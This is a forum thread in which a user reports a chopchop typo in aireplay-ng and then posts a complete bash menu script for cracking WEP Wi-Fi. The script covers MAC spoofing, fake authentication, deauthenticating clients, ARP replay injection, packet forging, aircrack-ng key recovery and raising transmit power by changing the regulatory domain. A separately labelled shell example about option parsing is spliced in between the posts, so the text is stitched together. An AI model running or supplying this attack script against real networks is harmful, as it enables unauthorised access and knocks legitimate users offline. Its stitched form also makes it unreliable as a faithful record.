
Thread: Aireplay-ng typo but chop chop still works!


  1. #1
    Junior Member, Join Date: Aug 2007, Location: Aussie, Posts: 25

    Aireplay-ng typo but chop chop still works!

    I have been writing an aircrack suite script to streamline most tasks and have been extensively testing it when I noticed a typo in aireplay-ng Chop Chop no-client packet forge.
    The odd thing is that it still works despite the typo: it still creates an XOR file, then a packet which, when injected, generates hundreds of IVs per second.

    The typo is:

    aireplay-ng -4 -h 11:11:11:11:11:11 -h 44:44:44:44:44:44 wlan1

    The MAC with the 1's was the AP and the MAC with the 4's was the fake-authed client, which was the MAC of my interface.

    The typo was in this order, where the first -h should have been a -b for the AP. Funnier still is that with the typo chop chop worked faster, at about 1/4 the time of the correct syntax.

    I'm running BT5 on a persistent USB, on an i7 laptop with Alfa network cards (AWUS036H and NH).

    I've added the script as a txt file; the typo has been fixed but you can see where it was in option 8.

    Drakedeon
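The observation above (two `-h` options accepted, no `-b` given, and the command still running) is a general property of option parsers that let a later occurrence of a flag silently overwrite an earlier one. The following is an added example, not part of the thread and not code from the posted script or from aireplay-ng: it shows the shell's own `getopts` doing exactly that, and a small check a wrapper script can run before handing a command line to a tool, so a duplicated or missing flag is caught instead of quietly changing what the tool does. The option letters `-b` and `-h` mirror the post; whether aireplay-ng's parser behaves the same way as `getopts` is an assumption the thread does not confirm.

```shell
#!/bin/sh
# Added example (not from the thread): how getopts treats a repeated option,
# and how a wrapper can refuse such a command line before passing it on.
# -b / -h mirror the option letters in the post; the parsing behaviour shown is
# that of the shell's getopts, not a claim about aireplay-ng (assumption).

# effective_opts: parse "$@" with getopts and print the value that survives
# for -b and -h after every occurrence has been processed.
effective_opts() {
    b="" h=""
    OPTIND=1                      # reset so the function can be called repeatedly
    while getopts "b:h:" opt; do
        case "$opt" in
            b) b="$OPTARG" ;;     # each occurrence overwrites the previous one
            h) h="$OPTARG" ;;
            *) return 2 ;;        # unknown option
        esac
    done
    printf 'b=%s h=%s\n' "${b:-unset}" "${h:-unset}"
}

# count_flag: number of times the option -$1 appears in the remaining arguments.
count_flag() {
    flag="$1"; shift
    n=0
    for arg in "$@"; do
        [ "$arg" = "-$flag" ] && n=$((n + 1))
    done
    echo "$n"
}

# check_cmdline: return 1 (with a message on stderr) if -b or -h is missing
# or given more than once, 0 if each appears exactly once.
check_cmdline() {
    for f in b h; do
        c=$(count_flag "$f" "$@")
        if [ "$c" -ne 1 ]; then
            echo "option -$f given $c times (expected exactly once)" >&2
            return 1
        fi
    done
    return 0
}

# Constructed sample command lines (the MACs are the placeholder values from the post):
effective_opts -h 11:11:11:11:11:11 -h 44:44:44:44:44:44 wlan1   # b=unset, second -h wins
effective_opts -b 11:11:11:11:11:11 -h 44:44:44:44:44:44 wlan1   # both set as intended
check_cmdline  -h 11:11:11:11:11:11 -h 44:44:44:44:44:44 wlan1 || echo "refused mistyped command line"
```

`check_cmdline` deliberately looks at the raw arguments rather than at what `getopts` returns, because by the time the parser has finished the information that a flag was repeated is already gone.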

  2. #2
    Junior Member, Join Date: Aug 2007, Location: Aussie, Posts: 25

    Re: Aireplay-ng typo but chop chop still works!

    Adding the script.
    Code:
    #!/bin/bash
    echo
    echo
    echo "Aircrack script by Steven Johnson copyright 2011"
    echo
    echo "Ensure this is run from a folder named air on desktop in Gnome"
    echo "or some functions may not work!"
    echo
    echo "Press any key"
    read
    iwconfig
    echo "Enter wireless interface to use in aircrack"
    read inter
    iwconfig $inter mode monitor
    echo "Use CTRL-C to exit airodump"
    echo "Press any key to continue"
    read
    
    airodump-ng $inter
    echo "Copy and paste AP MAC from airodump to use in aircrack"
    echo "Enter AP MAC to use in aircrack: press enter to skip"
    read APMAC
    echo
    echo "Do you want to spoof the mac of a client from airodump? y/n"
    echo
    echo "this interface MAC will then be used in aircrack"
    echo
    echo "Press n to run macchanger for interface:" $inter
    echo
    echo "Enter y or n: "
    read spo
    if [ "$spo" = "y" ]; then
    	echo "Copy and paste MAC from airodump above"
    	read YOURMAC
    	ifconfig $inter down
    	macchanger -m $YOURMAC $inter
    	ifconfig $inter up
    fi
    if [ "$spo" = "n" ]; then
    	echo
    	macchanger -h $inter
    	echo "Enter mode as above, s to show current MAC"
    	read mmd
    	ifconfig $inter down
    	macchanger -$mmd $inter
    	ifconfig $inter up
    	echo "Copy mac and paste interface MAC from above: "
    	read YOURMAC
    fi
    
    
    echo "Enter the SSID to use:  press enter to skip"
    read SSID
    
    fun=xxxx
    
    while [ "$fun" != "0" ]; do
    echo
    echo "PLEASE SELECT FUNCTION: "
    echo 
    echo "a = Enter access point mac to use " $APMAC
    echo "y = Enter your mac to use         " $YOURMAC
    echo "d = Enter SSID to use             " $SSID
    echo "s = Set interface to use          " $inter
    echo "p = Set power for interface"
    echo
    echo "i = iwconfig inc monitor mode"
    echo "f = ifconfig inc up and down"
    echo "m = Change or list MAC"
    echo "c = Set monitor mode with airmon"
    echo "q = Destroy interfaces"
    echo
    echo "1 = Airodump $inter"
    echo "2 = Airodump $inter on channel"
    echo "3 = Airodump $inter with file save"
    echo "4 = Airodump $inter on channel with file save"
    echo
    echo "5 = Fake Auth set channel first!"
    echo "6 = Aireplay injection for WEP"
    echo "7 = DeAuth client with aireplay"
    echo "8 = No client Packet Forge"
    echo "9 = Simple Packet Forge"
    echo "k = Aircrack"
    echo "0 = Exit"
    
    read fun
    
    if [ $fun = "p" ]; then
    echo
    echo "This will change the transmit power use at own risk!"
    echo "only tested on alfa usb interfaces NO GUARANTEES!"
    echo
    echo "Enter power 1-30 or e to exit"
    read powr
    	if [ $powr = "e" ]; then
    	echo "exiting no change"
    	else 
    	echo "setting power to:" $powr
    	read
    	st=set
    	ifconfig $inter down
    	iw reg $st BO
    	iwconfig $inter txpower $powr
    	ifconfig $inter up
    	iwconfig
    	echo "press any key"
    	read
    	fi	
    fi
    
    if [ $fun = "y" ]; then
    echo
    echo
    echo "Run macchanger to list or change the interface mac"
    echo
    echo "Copy and paste from macchanger or enter manually"
    echo
    echo "Enter the MAC you want to use as your MAC:"
    
    read YOURMAC
    fi
    
    
    if [ $fun = "a" ]; then
    echo "tip if you run airodump first you can copy and paste the mac"
    echo "enter the MAC you want to use as the AP MAC:"
    read APMAC
    fi
    
    if [ $fun = "d" ]; then
    echo "tip if you run airodump first you can copy and paste the SSID"
    echo "enter the SSID you want to use:"
    read SSID
    fi
    
    if [ $fun = "s" ]; then
    echo "enter the interface you want to use default wlan1"
    read inter
    fi
    
    if [ $fun = "f" ]; then
    ifconfig
    echo "enter option: "
    echo "e = exit"
    echo "d = take down interface" $inter
    echo "u = take up interface" $inter
    read ino
    	if [ "$ino" = "d" ]; then
    		ifconfig $inter down
    		ifconfig
    		echo "interface" $inter "should now be down"
    		echo "press any key"
    		read
    	elif [ "$ino" = "u" ]; then
    		ifconfig $inter up
    		ifconfig
    		echo "interface" $inter "should now be up"
    		echo "press any key"
    		read
    	else
    		echo "exiting"
    		echo
    	fi
    fi
    
    if [ $fun = "m" ]; then
    echo
    echo "Macchanger for interface: " $inter
    echo
    
    echo "tip you can copy a MAC from airodump to spoof."
    
    read 
    	macchanger -h
    	echo "enter mode as above: "
    	read mode
    	ifconfig $inter down
    	macchanger -$mode $inter
    	ifconfig $inter up
    	echo "press any key to continue"
    	read
    	
    fi
    
    if [ $fun = "i" ]; then
    iwconfig
    echo
    echo "Enter mode for interface:" $inter
    echo
    echo "1 = managed"
    echo "2 = monitor"
    echo "c = set channel"
    echo "e = exit"
    echo
    read mode
    	if [ "$mode" = "e" ]; then
    		echo "exiting"
    	elif [ "$mode" = "1" ]; then
    		ifconfig $inter down
    		iwconfig $inter mode managed
    		ifconfig $inter up
    		iwconfig
    		echo "press any key"
    		read
    	elif [ "$mode" = "2" ]; then
    		ifconfig $inter down
    		iwconfig $inter mode monitor
    		ifconfig $inter up
    		iwconfig
    		echo "press any key"
    		read
    	elif [ "$mode" = "c" ]; then
    		echo
    		echo "please enter channel:"
    		read chann
    		iwconfig $inter channel $chann
    		iwconfig
    		echo "press any key"
    		read
    	fi
    fi
    
    if [ $fun = "q" ]; then
    echo "enter interface to destroy: "
    read desint
    echo "this will destroy interface: " $desint
    echo "press y to continue or n to exit"
    read yornn
    	if [ "$yornn" = "y" ]; then
    		airmon-ng stop $desint
    		iwconfig
    	elif [ "$yornn" = "n" ]; then
    		echo "no change"
    	fi
    fi
    
    if [ $fun = "c" ]; then
    echo "do you want to set the Channel as well?"
    read setchan
    	if [ $setchan = "y" ]; then
    	echo "enter channel 1-11: "
    	read chhh
    	airmon-ng start $inter $chhh
    	echo "interface " $inter " should now be in monitor mode on channel: " $chhh " you may need to change the interface used now if mon# is made: "
    	echo "press any key"
    	read
    	else airmon-ng start $inter
    	echo "interface " $inter "should now be in monitor mode, you may need to change the interface used now if mon# is made"
    	echo "press any key"
    	read
    	fi
    fi
    
    if [ $fun = "1" ]; then
    
    gnome-terminal -e "bash -c 'airodump-ng $inter; read'"
    fi
    
    if [ $fun = "2" ]; then
    echo "enter channel: "
    read chch
    gnome-terminal -e "bash -c 'airodump-ng -c $chch $inter; read'"
    
    fi
    
    if [ $fun = "3" ]; then
    echo "enter Save File Name: "
    read Fname
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'airodump-ng -w /root/Desktop/air/$Fname $inter; read'"
    echo "repeat y/n:"
    read ww
    done
    fi
    
    if [ $fun = "4" ]; then
    echo "enter Save File Name: "
    read Fname
    echo "enter Channel: "
    read Ch
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'airodump-ng -c $Ch -w /root/Desktop/air/$Fname $inter; read'"
    
    echo "repeat y/n:"
    read ww
    done
    fi
    
    if [ $fun = "5" ]; then
    echo "do you want to use Picky Auth Y/N "
    echo
    echo "if you use Picky Auth CTRL C will end both Auth and this script"
    read Pa
    	if [ $Pa = "y" ]; then
    
    	wwww=y
    	while [ $wwww = "y" ]; do
    	gnome-terminal -e "bash -c 'aireplay-ng -1 6000 -o 1 -q 10 -e $SSID -a $APMAC -h $YOURMAC $inter; read'"
    	echo "press Y to repeat or N to return to main menu"
    	read wwww
    	done
    
    	else
    
    	www=y
    	while [ $www = "y" ]; do
    	gnome-terminal -e "bash -c 'aireplay-ng -1 0 -a $APMAC -h $YOURMAC $inter; read'"
    	echo "press Y to repeat or N to return to main menu"
    	read www
    	done
    	fi
    fi
    
    if [ $fun = "6" ]; then
    
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'aireplay-ng -3 -b $APMAC -h $YOURMAC $inter; read'"
    echo "repeat enter Y or N to return to main menu:"
    read ww
    done
    fi
    
    if [ $fun = "7" ]; then
    echo "stop airodump before copy and paste"
    echo "enter client to be DeAuthed can be copied from airodump"
    
    read Cda
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'aireplay-ng -0 10 -a $APMAC -c $Cda $inter; read'"
    echo "repeat enter Y or N to return to main menu:"
    read ww
    done
    fi
    
    if [ $fun = "8" ]; then
    echo
    echo "your MAC must be same as Fake Auth MAC"
    echo
    echo "do you want to use a previously forged packet y/n"
    read dd
    if [ $dd = "y" ]; then
    
    gnome-terminal -e "bash -c 'aireplay-ng -2 -r /root/Desktop/air/arpr $inter; read'"
    else
    
    echo "ensure packet greater than 68 bytes"
    echo 
    echo "don't use huge packets"
    echo
    echo "use CTRL C to exit"
    echo
    ww=y
    while [ $ww = "y" ]; do
    echo "f=frag   c=chop"
    read forc
    	if [ $forc = "f" ]; then
    	echo "copy .xor file name from next screen before pressing any key to close window"
    	echo "continue press any key"
    	read 
    	gnome-terminal -e "bash -c 'aireplay-ng -5 -b $APMAC -h $YOURMAC $inter; read'"
    	fi
    	if [ $forc = "c" ]; then
    	echo "copy .xor file name from next screen before pressing any key to close window"
    	echo "continue press any key"
    	read 
    	gnome-terminal -e "bash -c 'aireplay-ng -4 -b $APMAC -h $YOURMAC $inter; read'"
    	fi
    echo "enter xor file name: copy and paste from previous window"
    read xor
    packetforge-ng -0 -a $APMAC -h $YOURMAC -k 255.255.255.255 -l 255.255.255.255 -y /root/Desktop/air/$xor -w /root/Desktop/air/arpr
    echo "press any key to inject packet"
    read 
    gnome-terminal -e "bash -c 'aireplay-ng -2 -r /root/Desktop/air/arpr $inter'"
    echo "repeat process y/n: press n to exit then 8 to reinject saved packet"
    read ww
    done
    fi
    fi
    
    if [ $fun = "9" ]; then
    echo
    echo "start interface on right channel"
    echo "Ensure Fake Auth first"
    echo "run airodump-ng to capture replies"
    echo
    echo "press any key to start"
    read
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b $APMAC -h $YOURMAC $inter'"
    echo "repeat y/n:"
    read ww
    done
    fi
    
    if [ $fun = "k" ]; then
    echo
    echo "1 = Aircrack + PCAP file"
    echo "2 = ssid " $SSID " AP MAC " $APMAC " + PCAP file"
    echo
    read ACT
    echo "enter cap file name, add -01 -02 etc to file save name used in airodump:"
    echo ".cap will be appended"
    echo "keyfile saved in /root/Desktop/air/keyfile.txt"
    read Pcap
    	if [ $ACT = "1" ]; then
    	gnome-terminal -e "bash -c 'aircrack-ng -l /root/Desktop/air/keyfile.txt -s /root/Desktop/air/$Pcap.cap; read'"
    	
    	else
    	gnome-terminal -e "bash -c 'aircrack-ng -e $SSID -b $APMAC -l /root/Desktop/air/keyfile.txt -s /root/Desktop/air/$Pcap.cap; read'"
    	fi
    fi
    
    done
    drakedeon
